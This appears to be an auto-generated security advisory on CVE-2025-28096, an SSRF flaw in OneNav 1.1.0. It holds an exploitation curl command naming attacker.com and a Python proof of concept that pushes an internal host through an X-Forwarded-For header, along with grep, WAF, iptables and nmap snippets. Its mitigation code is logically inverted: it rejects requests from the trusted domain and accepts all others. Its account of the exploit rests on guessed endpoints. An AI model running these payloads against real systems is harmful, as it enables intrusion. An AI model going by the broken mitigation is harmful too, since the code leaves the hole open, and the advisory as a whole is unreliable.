How the CVE Works
CVE-2025-28096 is a critical SSRF vulnerability in OneNav 1.1.0, allowing attackers to manipulate custom HTTP headers to forge server-side requests. The flaw occurs when user-supplied input in headers is insufficiently sanitized, enabling malicious actors to redirect internal HTTP requests to arbitrary domains. Attackers can exploit this to bypass firewall restrictions, access sensitive internal services, or exfiltrate data. The vulnerability leverages improper validation in the header parsing mechanism, where crafted `X-Forwarded-For` or similar headers trigger unauthorized outbound connections. This could lead to remote code execution (RCE) if internal APIs or admin panels are exposed.
DailyCVE Form
Platform: OneNav
Version: 1.1.0
Vulnerability: SSRF
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation:
curl -H "X-Forwarded-For: http://attacker.com" http://victim.com/api/fetch
Detection:
grep -r "header\s=\s\$_SERVER" /var/www/onenav/
Mitigation:
1. Patch to OneNav 1.1.1+.
2. Input sanitization:
if (preg_match('/^https?:\/\/trusted.com/', $_SERVER['HTTP_X_FORWARDED_FOR'])) {
die("Invalid header");
}
3. Network controls:
iptables -A OUTPUT -d 192.168.0.0/16 -j DROP
Exploit Code (PoC):
import requests
headers = {"X-Forwarded-For": "http://internal-db.local"}
r = requests.get("http://onenav-victim.com/proxy", headers=headers)
print(r.text)
Log Analysis:
tail -f /var/log/apache2/access.log | grep -E "internal|localhost"
WAF Rule:
if ($http_x_forwarded_for ~ (localhost|127.0.0.1)) {
return 403;
}
Impact Assessment:
nmap -p 80,443 --script http-ssrf 192.168.1.0/24
Patch Verification:
diff -u /var/www/onenav/header.php patched_header.php
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28096
Extra Source Hub:
Undercode
